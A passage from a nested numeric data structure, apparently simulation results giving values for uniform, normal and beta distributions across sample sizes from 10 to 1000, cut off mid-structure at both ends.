0.0938143285125057, 'beta4': 0.035651375677830055}, 500: {'uni': 0.05445853301054582, 'nor': 0.09612181255635743, 'beta1': 0.05460984209093778, 'beta2': 0.10218771914762725, 'beta4': 0.04452799083539005}, 400: {'uni': 0.060889521772825805, 'nor': 0.10031899779947095, 'beta1': 0.060948683104371126, 'beta2': 0.10541070962786026, 'beta4': 0.05012038630616317}, 300: {'uni': 
0.07005128941367278, 'nor': 0.10658935036183773, 'beta1': 0.07009895459384657, 'beta2': 0.11170488328681916, 'beta4': 0.05864521177984011}, 200: {'uni': 0.08540225344537783, 'nor': 0.11890199866834528, 'beta1': 0.08502320710520805, 'beta2': 0.12395353434803436, 'beta4': 0.07387574145690157}, 150: {'uni': 0.09885046476067078, 'nor': 0.12839494402381713, 'beta1': 0.09934985587864284, 'beta2': 0.13434579187022588, 'beta4': 0.08566408819803323}, 100: {'uni': 0.12047137314751694, 'nor': 0.14581363150714843, 'beta1': 0.12030434397784306, 'beta2': 0.1511774251514193, 'beta4': 0.10729772293868556}, 75: {'uni': 0.13900232220953807, 'nor': 0.16310365822781592, 'beta1': 0.13886677230092376, 'beta2': 0.16609733213725825, 'beta4': 0.12653611564166728}, 50: {'uni': 0.16926530053780198, 'nor': 0.1894194492417549, 'beta1': 0.1702780520534074, 'beta2': 0.19236637904828646, 'beta4': 0.1577775823414037}, 30: {'uni': 0.21805620163425476, 'nor': 0.23303141581452969, 'beta1': 0.21774239331391093, 'beta2': 0.23521808252559517, 'beta4': 0.20825701308967687}, 20: {'uni': 0.2643242332020047, 'nor': 0.27896279120794987, 'beta1': 0.2652844445947362, 'beta2': 0.27899677620691904, 'beta4': 0.2564356340644192}, 10: {'uni': 0.36868660537699743, 'nor': 0.3801425407117649, 'beta1': 0.3691995028759322, 'beta2': 0.37929775988096986, 'beta4': 0.3638553742502826}}, 75: {1000: {'uni': 0.03947518275469575, 'nor': 0.0972287182231617, 'beta1': 0.03864849717150598, 'beta2': 0.0952234254591443, 'beta4': 0.030504505239134838}, 750: {'uni': 0.04551965251101908, 'nor': 0.10116693467733584, 'beta1': 0.04443711038356635, 'beta2': 0.09869508499069957, 'beta4': 0.03555977512406705}, 500: {'uni': 0.05494057158528598, 'nor': 0.1057676067326096, 'beta1': 0.05445336207397927, 'beta2': 0.1055765017477942, 'beta4': 0.043998042119070546}, 400: {'uni': 0.060969026310390834, 'nor': 0.10945271980173626, 'beta1': 0.061077517258748326, 'beta2': 0.1099056389579467, 'beta4': 0.04942638750338929}, 300: {'uni': 
0.07012941993226982, 'nor': 0.11595846348507075, 'beta1': 0.07039222027455194, 'beta2': 0.11738385669726281, 'beta4': 0.057678877694784}, 200: {'uni': 0.08638646649234194, 'nor': 0.126890208298988, 'beta1': 0.08609870986026835, 'beta2': 0.1293273654437882, 'beta4': 0.07214722508101312}, 150: {'uni': 0.09903143295834599, 'nor': 0.13569255431524507, 'beta1': 0.0986204644618468, 'beta2': 0.1383759438633969, 'beta4': 0.08472012631786002}, 100: {'uni': 0.12042784597491996, 'nor': 0.1538654219813379, 'beta1': 0.12047443267408167, 'beta2': 0.15479064845781504, 'beta4': 0.10572696956038574}, 75: {'uni': 0.13830413084922855, 'nor': 0.16929639027614796, 'beta1': 0.1387890089056115, 'beta2': 0.16973078116853618, 'beta4': 0.12418040490595178}, 50: {'uni': 0.16830423148890084, 'nor': 0.1942891319284309, 'beta1': 0.16984574641040717, 'beta2': 0.19571354576291627, 'beta4': 0.15658953127105207}, 30: {'uni': 0.21781307361797006, 'nor': 0.23824445270348382, 'beta1': 0.21900666049148654, 'beta2': 0.23923389502771286, 'beta4': 0.20443259848465625}, 20: {'uni': 0.2619095049476788, 'nor': 0.2830118442439754, 'beta1': 0.26563000767153383, 'beta2': 0.281971996905995, 'beta4': 0.25388919785330466}, 10: {'uni': 0.3685724124734001, 'nor': 0.38033611275896406, 'beta1': 0.3703883643155905, 'beta2': 0.3794242112561502, 'beta4': 0.3585528364829571}}, 50: {1000: {'uni': 0.04077866659121632, 'nor': 0.11580496049799294, 'beta1': 0.03853944253374597, 'beta2': 0.10586786875499299, 'beta4': 0.03023595571004084}, 750: {'uni': 0.04664929426958103, 'nor': 0.11784347998818245, 'beta1': 0.04458588264014807, 'beta2': 0.10969638470331955, 'beta4': 0.03498175243961467}, 500: {'uni': 0.05599120254346879, 'nor': 0.1227826762822789, 'beta1': 0.05467291714710451, 'beta2': 0.11556286804274307, 'beta4': 0.04331548807386715}, 400: {'uni': 0.0618059390475908, 'nor': 0.12716067908984624, 'beta1': 0.06076018571852698, 'beta2': 0.11944923182949141, 'beta4': 0.048733808094156394}, 300: {'uni': 0.07145474332507373, 'nor': 
0.13215808532037732, 'beta1': 0.07005566740115332, 'beta2': 0.12493758821402545, 'beta4': 0.05655427961943388}, 200: {'uni': 0.08649126875588486, 'nor': 0.14398532562620858, 'beta1': 0.08564125071746342, 'beta2': 0.13571236054952152, 'beta4': 0.07038554117278428}, 150: {'uni': 0.09972216582225901, 'nor': 0.15081713302440228, 'beta1': 0.0980320332573475, 'beta2': 0.14532447093659528, 'beta4': 0.08274587331420269}, 100: {'uni': 0.12039381304129049, 'nor': 0.16746812959278995, 'beta1': 0.12027519702689837, 'beta2': 0.16277345040644908, 'beta4': 0.10360078281945007}, 75: {'uni': 0.13935366553924022, 'nor': 0.18277769750800105, 'beta1': 0.13931147415294898, 'beta2': 0.17557555907632716, 'beta4': 0.120496470943599}, 50: {'uni': 0.17045968935190703, 'nor': 0.2061624163310195, 'beta1': 0.16850089401261617, 'beta2': 0.20076750567324442, 'beta4': 0.1524439268490353}, 30: {'uni': 0.21706058239993287, 'nor': 0.24724662889782345, 'beta1': 0.21628695050401275, 'beta2': 0.2432570996508593, 'beta4': 0.2007074069679156}, 20: {'uni': 0.2644244349370678, 'nor': 0.2888841367890824, 'beta1': 0.2655430776294785, 'beta2': 0.2844954992477471, 'beta4': 0.24845905058828244}, 10: {'uni': 0.3691891891585487, 'nor': 0.38713991936611614, 'beta1': 0.36692723160862345, 'beta2': 0.38140488493099745, 'beta4': 0.3576454464109796}}, 30: {1000: {'uni': 0.045457677191963586, 'nor': 0.1457355582484376, 'beta1': 0.038546756955813, 'beta2': 0.1200679160771897, 'beta4': 0.030100677632104778}, 750: {'uni': 0.04995866353212569, 'nor': 0.14761791285414627, 'beta1': 0.044554754363745674, 'beta2': 0.12224473120434098, 'beta4': 0.03495775636349063}, 500: {'uni': 0.05880880623556495, 'nor': 0.15281360983908227, 'beta1': 0.05437068025855424, 'beta2': 0.12753056289514525, 'beta4': 0.0428449240771841}, 400: {'uni': 0.0645126168303099, 'nor': 0.15525355878197838, 'beta1': 0.061035794772328456, 'beta2': 0.1318918900818361, 'beta4': 0.048131670902745394}, 300: {'uni': 0.0736981524234896, 'nor': 0.16102927114194954, 
'beta1': 0.0699378076866422, 'beta2': 0.1359450077822285, 'beta4': 0.055744371538938964}, 200: {'uni': 0.08801073759496875, 'nor': 0.16994023103299272, 'beta1': 0.08505228657724262, 'beta2': 0.1463769299335057, 'beta4': 0.06912750948895652}, 150: {'uni': 0.10119998770539862, 'nor': 0.17809227114576442, 'beta1': 0.09846662120153019, 'beta2': 0.1563069707446343, 'beta4': 0.0804849907703572}, 100: {'uni': 0.12165160638390676, 'nor': 0.1925681843339241, 'beta1': 0.12041960699493481, 'beta2': 0.17156822159027985, 'beta4': 0.10014130433781748}, 75: {'uni': 0.13975451811748224, 'nor': 0.2056309659993777, 'beta1': 0.13866205873705784, 'beta2': 0.1837990537785728, 'beta4': 0.11619303536405938}, 50: {'uni': 0.1707628459531228, 'nor': 0.22834518013555266, 'beta1': 0.16826103008208187, 'beta2': 0.20898788453415473, 'beta4': 0.1459501849665349}, 30: {'uni': 0.21737854401306778, 'nor': 0.2651944679135494, 'beta1': 0.2169374533538973, 'beta2': 0.24814946824995282, 'beta4': 0.19477597502585953}, 20: {'uni': 0.26172292368747657, 'nor': 0.30251728219002344, 'beta1': 0.2644484410276723, 'beta2': 0.29110454324712, 'beta4': 0.24126464705741385}, 10: {'uni': 0.3667581652322965, 'nor': 0.40279126451218983, 'beta1': 0.3692768516896085, 'beta2': 0.3866633789743732, 'beta4': 0.34861300659940814}}, 20: {1000: {'uni': 0.05370924654054801, 'nor': 0.17648599487397, 'beta1': 0.04804540228549625, 'beta2': 0.1343446649365414, 'beta4': 0.02997352312939844}, 750: {'uni': 0.05729122370623074, 'nor': 0.1803587541418622, 'beta1': 0.04812500176891543, 'beta2': 0.13786905650664827, 'beta4': 0.03477191515013617}, 500: {'uni': 0.06464930552073, 'nor': 0.18336329212636393, 'beta1': 0.05469422873209995, 'beta2': 0.14239511606905197, 'beta4': 0.04271981408076597}, 400: {'uni': 0.06986628923619037, 'nor': 0.18625313891095058, 'beta1': 0.06071158332876331, 'beta2': 0.14471049421579463, 'beta4': 0.047627222949097936}, 300: {'uni': 0.0777256622725595, 'nor': 0.18953337250453745, 'beta1': 0.070054764465032, 
'beta2': 0.1512744075762968, 'beta4': 0.0552010190871432}, 200: {'uni': 0.09158087111218582, 'nor': 0.19800738103301052, 'beta1': 0.0864137923024384, 'beta2': 0.15931545015663917, 'beta4': 0.06814299912620103}, 150: {'uni': 0.10335435452469321, 'nor': 0.2054309649794448, 'beta1': 0.09892077062896198, 'beta2': 0.16793211210769832, 'beta4': 0.07953126024663426}, 100: {'uni': 0.12424516715196299, 'nor': 0.21856150700189325, 'beta1': 0.12057266069376027, 'beta2': 0.18383332726712043, 'beta4': 0.09738694233698236}, 75: {'uni': 0.1417104597444815, 'nor': 0.23034885885084855, 'beta1': 0.13841928094108402, 'beta2': 0.1968525929870979, 'beta4': 0.1150925954043509}, 50: {'uni': 0.17111110661077933, 'nor': 0.2524518773718313, 'beta1': 0.17046731006299556, 'beta2': 0.21788191331659196, 'beta4': 0.14222869732898685}, 30: {'uni': 0.21687551224414225, 'nor': 0.28926214134356854, 'beta1': 0.21629470859709887, 'beta2': 0.25673815181901094, 'beta4': 0.1892955689821264}, 20: {'uni': 0.26430445397421665, 'nor': 0.3247388087097957, 'beta1': 0.2638148393051306, 'beta2': 0.29743250866558657, 'beta4': 0.23622944016863467}, 10: {'uni': 0.36737909439043254, 'nor': 0.4125208499637192, 'beta1': 0.3660874383968239, 'beta2': 0.38838554766199895, 'beta4': 0.3439063586015456}}, 10: {1000: {'uni': 0.08862146976790009, 'nor': 0.2535995199262815, 'beta1': 0.09069671581521854, 'beta2': 0.16803506355157516, 'beta4': 0.029921859317868282}, 750: {'uni': 0.08977033393809541, 'nor': 0.254580496609131, 'beta1': 0.09071297119014299, 'beta2': 0.1691038026265949, 'beta4': 0.034510090116727565}, 500: {'uni': 0.09238549230306914, 'nor': 0.25987057271300046, 'beta1': 0.09073934473664924, 'beta2': 0.17440911430930217, 'beta4': 0.04213161613017047}, 400: {'uni': 0.09459196287285188, 'nor': 0.26027933684777826, 'beta1': 0.09074209915698388, 'beta2': 0.17593382577625938, 'beta4': 0.04768105187754579}, 300: {'uni': 0.09917712584623528, 'nor': 0.2615501480076419, 'beta1': 0.09091594609476689, 'beta2': 
0.1805409357764428, 'beta4': 0.05498060190263093}, 200: {'uni': 0.10872992256114376, 'nor': 0.2695197969164528, 'beta1': 0.09138518619528078, 'beta2': 0.18687142652551247, 'beta4': 0.06740841503327016}, 150: {'uni': 0.11782830618505136, 'nor': 0.2762185043437084, 'beta1': 0.10051161390790297, 'beta2': 0.1942070856751601, 'beta4': 0.07819221056213072}, 100: {'uni': 0.13438399664084844, 'nor': 0.28816303619228323, 'beta1': 0.12084090735087949, 'beta2': 0.20547572552005522, 'beta4': 0.09570415694090936}, 75: {'uni': 0.15023870303077683, 'nor': 0.2958611782293753, 'beta1': 0.1395907599244337, 'beta2': 0.21686046108693185, 'beta4': 0.11050164335769763}, 50: {'uni': 0.1782266716766201, 'nor': 0.3141960877725066, 'beta1': 0.16859036565221908, 'beta2': 0.24007665604305778, 'beta4': 0.13764276895735614}, 30: {'uni': 0.22096576164827378, 'nor': 0.3459767153505968, 'beta1': 0.21633032217123638, 'beta2': 0.27349437174891433, 'beta4': 0.18066617575900545}, 20: {'uni': 0.26383403962743235, 'nor': 0.37594074244986514, 'beta1': 0.26301385683685513, 'beta2': 0.3103976354263712, 'beta4': 0.22515639301084087}, 10: {'uni': 0.3664196082159237, 'nor': 0.45714739810989896, 'beta1': 0.3636555139455243, 'beta2': 0.3974337064021698, 'beta4': 0.3276445784663552}}}, 0.2: {1000: {1000: {'uni': 0.03388738157245541, 'nor': 0.04015666897414438, 'beta1': 0.03355667375414395, 'beta2': 0.055574500180284314, 'beta4': 0.03068120985677973}, 750: {'uni': 0.03899522828726909, 'nor': 0.04482662034784124, 'beta1': 0.038906952257139416, 'beta2': 0.0577336142241367, 'beta4': 0.035726625386190314}, 500: {'uni': 0.047776296371012106, 'nor': 0.0524414607908541, 'beta1': 0.04779122142786796, 'beta2': 0.06290813245562621, 'beta4': 0.04449308639070271}, 400: {'uni': 0.05336721519256357, 'nor': 0.05743278486341408, 'beta1': 0.053125312827925875, 'beta2': 0.06632258983296924, 'beta4': 0.05071787362274782}, 300: {'uni': 0.0613357895908182, 'nor': 0.06550100428584399, 'beta1': 0.06109741329317647, 'beta2': 
0.07293163000037511, 'beta4': 0.05908868335670159}, 200: {'uni': 0.07501845542232805, 'nor': 0.07876069039917577, 'beta1': 0.07500276171787268, 'beta2': 0.08419855412256849, 'beta4': 0.07278561303210473}, 150: {'uni': 0.08634506901837877, 'nor': 0.08904521157666112, 'beta1': 0.08632477062450605, 'beta2': 0.09453176706786948, 'beta4': 0.08472926033937267}, 100: {'uni': 0.1057124222050787, 'nor': 0.10808546837916216, 'beta1': 0.10516591278839627, 'beta2': 0.11170808920861064, 'beta4': 0.10393226778652609}, 75: {'uni': 0.12149208320718635, 'nor': 0.12306907509286319, 'beta1': 0.12209431187926248, 'beta2': 0.12646902554095174, 'beta4': 0.12019336772939093}, 50: {'uni': 0.14783464657037992, 'nor': 0.14989562158896733, 'beta1': 0.14870430658867798, 'beta2': 0.15298471478505016, 'beta4': 0.14675275578661956}, 30: {'uni': 0.19121204259605487, 'nor': 0.19161889709583674, 'beta1': 0.18958426307805673, 'beta2': 0.19343552624644, 'beta4': 0.18882942312354808}, 20: {'uni': 0.23271862737098403, 'nor': 0.23131945605660487, 'beta1': 0.23084583243478113, 'beta2': 0.2339139193810307, 'beta4': 0.23046342255270594}, 10: {'uni': 0.3225715177370052, 'nor': 0.32210711594806274, 'beta1': 0.32134895787627404, 'beta2': 0.32533513676914994, 'beta4': 0.32219881278226875}}, 750: {1000: {'uni': 0.03376714362696076, 'nor': 0.042024347317684174, 'beta1': 0.03369092286126596, 'beta2': 0.055889726610143464, 'beta4': 0.03024928592128745}, 750: {'uni': 0.03891496409139339, 'nor': 0.046131807231977684, 'beta1': 0.038847267411021014, 'beta2': 0.05801346441223432, 'beta4': 0.035253753207794225}, 500: {'uni': 0.04749484005992066, 'nor': 0.05359269975534858, 'beta1': 0.04758858015566003, 'beta2': 0.06257170586617439, 'beta4': 0.044068141367767266}, 400: {'uni': 0.05297468125525839, 'nor': 0.05926387355580798, 'beta1': 0.05295355833022475, 'beta2': 0.0666115313485337, 'beta4': 0.04992787350991934}, 300: {'uni': 0.06112594909603697, 'nor': 0.06629753648545333, 'beta1': 0.06138650353983818, 'beta2': 
0.07343192849203295, 'beta4': 0.05810524207749168}, 200: {'uni': 0.07490063551528908, 'nor': 0.07942685260233576, 'beta1': 0.07438999529385071, 'beta2': 0.08515842923668693, 'beta4': 0.07205056427377587}, 150: {'uni': 0.08639622501196301, 'nor': 0.08962430009180156, 'beta1': 0.08575239384506436, 'beta2': 0.09486183374614099, 'beta4': 0.0835611646348291}, 100: {'uni': 0.10581425933251165, 'nor': 0.10810039846104558, 'beta1': 0.10589792403845494, 'beta2': 0.11188037819837482, 'beta4': 0.10306934411821278}, 75: {'uni': 0.1214540209799046, 'nor': 0.12485134735341119, 'beta1': 0.12141611216283932, 'beta2': 0.12662789787139295, 'beta4': 0.11982036085184888}, 50: {'uni': 0.14841865927342057, 'nor': 0.15115605407635108, 'beta1': 0.14882335320078816, 'beta2': 0.15301035196557927, 'beta4': 0.14740389167526288}, 30: {'uni': 0.19055206451646386, 'nor': 0.19229401661443357, 'beta1': 0.19006065116918158, 'beta2': 0.19466607401258693, 'beta4': 0.18866007451684785}, 20: {'uni': 0.23100251462520283, 'nor': 0.23351937614410023, 'beta1': 0.23055792133077502, 'beta2': 0.23429666500235652, 'beta4': 0.23068072631463016}, 10: {'uni': 0.321735912802274, 'nor': 0.32423692759003264, 'beta1': 0.3239617966140733, 'beta2': 0.32437308055517045, 'beta4': 0.3249136529859552}}, 500: {1000: {'uni': 0.03361099658500921, 'nor': 0.045330398129452165, 'beta1': 0.03371228816752819, 'beta2': 0.05832511086354275, 'beta4': 0.029273019646634646}, 750: {'uni': 0.038816575943483644, 'nor': 0.0491504214333881, 'beta1': 0.039015892770372096, 'beta2': 0.060770948426164983, 'beta4': 0.034501276617158405}, 500: {'uni': 0.04815961880455866, 'nor': 0.05646388049918538, 'beta1': 0.047616095765788624, 'beta2': 0.06578607920387605, 'beta4': 0.043089689535904585}, 400: {'uni': 0.053452201672102295, 'nor': 0.06153375349484047, 'beta1': 0.052983040292405525, 'beta2': 0.07031702338528978, 'beta4': 0.048637574479821644}, 300: {'uni': 0.06127370649997177, 'nor': 0.06874638836387548, 'beta1': 0.06133068039745698, 'beta2': 
0.07561704434900895, 'beta4': 0.057273437560509066}, 200: {'uni': 0.07472226953381489, 'nor': 0.08105755495025313, 'beta1': 0.07504375951495804, 'beta2': 0.0877176493907923, 'beta4': 0.07144906208708657}, 150: {'uni': 0.08655826756432694, 'nor': 0.09209107605088962, 'beta1': 0.08700099545101375, 'beta2': 0.09953347989595823, 'beta4': 0.08270140680266824}, 100: {'uni': 0.10589569548753086, 'nor': 0.11067808441589783, 'beta1': 0.10570360745340612, 'beta2': 0.11521549542004672, 'beta4': 0.10204817369562785}, 75: {'uni': 0.1214238464236953, 'nor': 0.1257918905040879, 'beta1': 0.12201308622504331, 'beta2': 0.12918412209535224, 'beta4': 0.1184359299309477}, 50: {'uni': 0.14801176067778704, 'nor': 0.15169848925285823, 'beta1': 0.1490310518112693, 'beta2': 0.15460147219717485, 'beta4': 0.14566535210883857}, 30: {'uni': 0.19132874999388066, 'nor': 0.19329023907863613, 'beta1': 0.1907485547222172, 'beta2': 0.1941783283376482, 'beta4': 0.18736708420254317}, 20: {'uni': 0.23282248165413844, 'nor': 0.232655718238027, 'beta1': 0.23254110249310414, 'beta2': 0.23479815552622696, 'beta4': 0.22895872572703413}, 10: {'uni': 0.3238030709255784, 'nor': 0.32527484356803527, 'beta1': 0.32251033930915673, 'beta2': 0.325462541104486, 'beta4': 0.3216777112141702}}, 400: {1000: {'uni': 0.03386042788512955, 'nor': 0.047710828017344276, 'beta1': 0.0337310904928686, 'beta2': 0.05890009367362975, 'beta4': 0.029040534438643628}, 750: {'uni': 0.03904468308757758, 'nor': 0.051551219035761986, 'beta1': 0.03885610324170258, 'beta2': 0.0606985856416401, 'beta4': 0.0340554853290308}, 500: {'uni': 0.047602093704168735, 'nor': 0.05814584365187403, 'beta1': 0.04748869924936838, 'beta2': 0.06611742375228202, 'beta4': 0.04271018009250971}, 400: {'uni': 0.05304223077370851, 'nor': 0.06292081768546079, 'beta1': 0.05279164279598325, 'beta2': 0.07002077573100743, 'beta4': 0.04866770038722679}, 300: {'uni': 0.06141397119642633, 'nor': 0.07030627117167121, 'beta1': 0.06097126432087274, 'beta2': 
0.07635636078134611, 'beta4': 0.056339224324690684}, 200: {'uni': 0.07503889889243953, 'nor': 0.08238702118585328, 'beta1': 0.07494642001255589, 'beta2': 0.08906360121274909, 'beta4': 0.07041606833950242}, 150: {'uni': 0.08650534294392143, 'nor': 0.09368577651895194, 'beta1': 0.08609035232292472, 'beta2': 0.09880346197322298, 'beta4': 0.08192514174926191}, 100: {'uni': 0.10554211559941079, 'nor': 0.11085547265078599, 'beta1': 0.10592424086268526, 'beta2': 0.11560686173795065, 'beta4': 0.10181407800596476}, 75: {'uni': 0.12118585486438052, 'nor': 0.12734779642511718, 'beta1': 0.12111707280276551, 'beta2': 0.1305965998046278, 'beta4': 0.11787930087738932}, 50: {'uni': 0.14797599649230353, 'nor': 0.15171514649116935, 'beta1': 0.1484099702342504, 'beta2': 0.15541609636822673, 'beta4': 0.14510227576798918}, 30: {'uni': 0.19021549568018936, 'nor': 0.1933618553897194, 'beta1': 0.1907191702304276, 'beta2': 0.19541117767136984, 'beta4': 0.18755377058130973}, 20: {'uni': 0.23146197858779916, 'nor': 0.23407289720723795, 'beta1': 0.23230655807246425, 'beta2': 0.23567907159586732, 'beta4': 0.2291439538234219}, 10: {'uni': 0.3221026192917168, 'nor': 0.3245602129335199, 'beta1': 0.32277705217495795, 'beta2': 0.3261921289212465, 'beta4': 0.32191737143798144}}, 300: {1000: {'uni': 0.033695118131507495, 'nor': 0.05091916329512536, 'beta1': 0.03393619351717603, 'beta2': 0.06057179016027847, 'beta4': 0.0285990426293512}, 750: {'uni': 0.03910414563500947, 'nor': 0.05465137245133267, 'beta1': 0.038816776120210894, 'beta2': 0.06313897920954847, 'beta4': 0.033354645226166046}, 500: {'uni': 0.04762543649309181, 'nor': 0.06159887019353166, 'beta1': 0.04780391171257714, 'beta2': 0.0681292524818165, 'beta4': 0.04184091667546608}, 400: {'uni': 0.05345378246611335, 'nor': 0.06617151036624425, 'beta1': 0.05302241280194575, 'beta2': 0.07278816401083432, 'beta4': 0.04729132105092715}, 300: {'uni': 0.06133399743947998, 'nor': 0.0731521981557415, 'beta1': 0.061595854882960877, 'beta2': 
0.08129842890779082, 'beta4': 0.055524597397617226}, 200: {'uni': 0.07473088765308139, 'nor': 0.0848296423748201, 'beta1': 0.07519297407714975, 'beta2': 0.09105884496116406, 'beta4': 0.06951013639767534}, 150: {'uni': 0.08667661820391337, 'nor': 0.09523718870586606, 'beta1': 0.08692359414490303, 'beta2': 0.10060898747715086, 'beta4': 0.08103195453051082}, 100: {'uni': 0.10553388362967905, 'nor': 0.11381051637354644, 'beta1': 0.10561397962134611, 'beta2': 0.11792834991131423, 'beta4': 0.10090718775359064}, 75: {'uni': 0.12155221095133384, 'nor': 0.12793878242727197, 'beta1': 0.1215592598705928, 'beta2': 0.1322756449085521, 'beta4': 0.1168330578874448}, 50: {'uni': 0.14804683077762326, 'nor': 0.15419659403457153, 'beta1': 0.14866575944705585, 'beta2': 0.15751859961478853, 'beta4': 0.14405280732471298}, 30: {'uni': 0.19026263588328451, 'nor': 0.19412845565379028, 'beta1': 0.19049550527182446, 'beta2': 0.196939457774988, 'beta4': 0.1866360117186579}, 20: {'uni': 0.2313876995850297, 'nor': 0.23502769104830612, 'beta1': 0.23105225723665046, 'beta2': 0.23608963938520033, 'beta4': 0.2292267482273611}, 10: {'uni': 0.3221120205638056, 'nor': 0.3243045336872488, 'beta1': 0.3208731593800577, 'beta2': 0.3252380584126876, 'beta4': 0.31984201603154766}}, 200: {1000: {'uni': 0.03389126620048066, 'nor': 0.05765077575778865, 'beta1': 0.03376008405740816, 'beta2': 0.06437824504169704, 'beta4': 0.0279614561315292}, 750: {'uni': 0.03903612475565288, 'nor': 0.06067305171910875, 'beta1': 0.039025478836297256, 'beta2': 0.06680002944624919, 'beta4': 0.03292291515427731}, 500: {'uni': 0.04775932391254628, 'nor': 0.06680855125140311, 'beta1': 0.04777372167795524, 'beta2': 0.0730432372041967, 'beta4': 0.04099670926553012}, 400: {'uni': 0.053169992426212453, 'nor': 0.07130050098050561, 'beta1': 0.053126182451097015, 'beta2': 0.07958454016209743, 'beta4': 0.046411644412640785}, 300: {'uni': 0.06084117394290545, 'nor': 0.07778044249500193, 'beta1': 0.06160223598764697, 'beta2': 
0.08429495593767933, 'beta4': 0.05440016577981527}, 200: {'uni': 0.07486690598932355, 'nor': 0.09015651052130147, 'beta1': 0.0750283211417685, 'beta2': 0.09516934496985152, 'beta4': 0.06768527669021038}, 150: {'uni': 0.08629721643574545, 'nor': 0.0993067628049017, 'beta1': 0.08668817140327162, 'beta2': 0.10516268131208634, 'beta4': 0.07953728925132197}, 100: {'uni': 0.10546884892973363, 'nor': 0.1168548961678525, 'beta1': 0.10626217079796596, 'beta2': 0.1204989099383002, 'beta4': 0.09903875776592275}, 75: {'uni': 0.12168012164046638, 'nor': 0.1314303884963226, 'beta1': 0.12214826537759482, 'beta2': 0.1351994296696919, 'beta4': 0.1149866262333511}, 50: {'uni': 0.14782352233644408, 'nor': 0.15754764223117135, 'beta1': 0.14825063238007496, 'beta2': 0.15841952571485496, 'beta4': 0.14294406590744546}, 30: {'uni': 0.19048227877938156, 'nor': 0.1967417135295928, 'beta1': 0.18997647207879326, 'beta2': 0.1985375655182654, 'beta4': 0.1860365582166873}, 20: {'uni': 0.23118653990494603, 'nor': 0.2362845426246003, 'beta1': 0.23216547900931916, 'beta2': 0.23821825980001504, 'beta4': 0.22782447476862544}, 10: {'uni': 0.3211281593663615, 'nor': 0.32606182576485077, 'beta1': 0.3236233700149418, 'beta2': 0.32878598247569857, 'beta4': 0.3207221077913689}}, 150: {1000: {'uni': 0.03396456507138623, 'nor': 0.0630608330646778, 'beta1': 0.0337277801465099, 'beta2': 0.06770210959513101, 'beta4': 0.02782320511153541}, 750: {'uni': 0.03910044490462494, 'nor': 0.06648103251076115, 'beta1': 0.03880293828339021, 'beta2': 0.07044578061655482, 'beta4': 0.032404976904047755}, 500: {'uni': 0.047957863191993855, 'nor': 0.07218240504190596, 'beta1': 0.04756246411890541, 'beta2': 0.07886065014379595, 'beta4': 0.04025719542113432}, 400: {'uni': 0.05359261424909634, 'nor': 0.07672357193415957, 'beta1': 0.053195230735709365, 'beta2': 0.08232822341436707, 'beta4': 0.045660798052570645}, 300: {'uni': 0.06095634560530494, 'nor': 0.08246385189061045, 'beta1': 0.06158333945371208, 'beta2': 
0.08770721726682829, 'beta4': 0.053329443870827636}, 200: {'uni': 0.07542313957478985, 'nor': 0.09376844697035747, 'beta1': 0.07502483861611764, 'beta2': 0.09930331490997918, 'beta4': 0.06676883228264996}, 150: {'uni': 0.08612997994268534, 'nor': 0.10304658085927404, 'beta1': 0.08676278127457426, 'beta2': 0.10801928051315668, 'beta4': 0.07857687034701241}, 100: {'uni': 0.10487250667170855, 'nor': 0.11932842046669623, 'beta1': 0.10614742264977517, 'beta2': 0.1240130501571779, 'beta4': 0.09727175686115075}, 75: {'uni': 0.12125587425148476, 'nor': 0.13477382757210765, 'beta1': 0.12123394920739405, 'beta2': 0.13735136783257884, 'beta4': 0.11414306692306875}, 50: {'uni': 0.14807161438081134, 'nor': 0.15892016658734387, 'beta1': 0.148560766937952, 'beta2': 0.16159831870181401, 'beta4': 0.1417900094042981}, 30: {'uni': 0.18999549214586064, 'nor': 0.19904964098027866, 'beta1': 0.19071102883002822, 'beta2': 0.20019795935043838, 'beta4': 0.18394814557977696}, 20: {'uni': 0.2315147837574712, 'nor': 0.23783415188052248, 'beta1': 0.2324397659800763, 'beta2': 0.23998185635535838, 'beta4': 0.22593857547727642}, 10: {'uni': 0.3219852137932768, 'nor': 0.32723676254678064, 'beta1': 0.32356225696956475, 'beta2': 0.3269691590497776, 'beta4': 0.3198335598449822}}, 100: {1000: {'uni': 0.03411194849559385, 'nor': 0.07287242105906888, 'beta1': 0.03382125829922744, 'beta2': 0.07002374839528969, 'beta4': 0.027407494662168852}, 750: {'uni': 0.03938154082727641, 'nor': 0.07580278019762332, 'beta1': 0.039103170488301364, 'beta2': 0.07321818422715465, 'beta4': 0.03188744748160627}, 500: {'uni': 0.04778928237643254, 'nor': 0.08110701684552524, 'beta1': 0.047810374146142864, 'beta2': 0.08203011864750759, 'beta4': 0.03952324078463222}, 400: {'uni': 0.0534810053390774, 'nor': 0.08508194249549039, 'beta1': 0.05352127702635723, 'beta2': 0.08537754830278577, 'beta4': 0.04481417769901397}, 300: {'uni': 0.06166341110979501, 'nor': 0.09150201948101794, 'beta1': 0.06113077709028425, 'beta2': 
0.09038186391687197, 'beta4': 0.05211846493236742}, 200: {'uni': 0.07520911700485444, 'nor': 0.10091005418742754, 'beta1': 0.07506822671283137, 'beta2': 0.10171318740985519, 'beta4': 0.06518371829303138}, 150: {'uni': 0.08676252704286641, 'nor': 0.109975580477785, 'beta1': 0.08644340439225118, 'beta2': 0.11178799632878333, 'beta4': 0.07633395622902756}, 100: {'uni': 0.10629645295984264, 'nor': 0.1258041278664646, 'beta1': 0.10529533439068595, 'beta2': 0.12702981218946555, 'beta4': 0.09569346182437452}, 75: {'uni': 0.12112331247638874, 'nor': 0.14051961004379154, 'beta1': 0.12250367446398408, 'beta2': 0.1419312079891245, 'beta4': 0.11164814343344687}, 50: {'uni': 0.14850915109683305, 'nor': 0.164857883156725, 'beta1': 0.14797844957977346, 'beta2': 0.16537134374996698, 'beta4': 0.13887660533943375}, 30: {'uni': 0.19061314919489092, 'nor': 0.20238067255048653, 'beta1': 0.1898804661221951, 'beta2': 0.2034759671609193, 'beta4': 0.18169040960889707}, 20: {'uni': 0.23206346175230053, 'nor': 0.24178386379175654, 'beta1': 0.2312278955520718, 'beta2': 0.24112122817067416, 'beta4': 0.22539667105811617}, 10: {'uni': 0.3196702240237979, 'nor': 0.33251158834688327, 'beta1': 0.32295889633274955, 'beta2': 0.328393531993296, 'beta4': 0.31666570512538683}}, 75: {1000: {'uni': 0.03485783601744907, 'nor': 0.08051567869925941, 'beta1': 0.033648744067629854, 'beta2': 0.07403441562434876, 'beta4': 0.02718882272100026}, 750: {'uni': 0.039971273861006185, 'nor': 0.08378469794057, 'beta1': 0.03914992626191016, 'beta2': 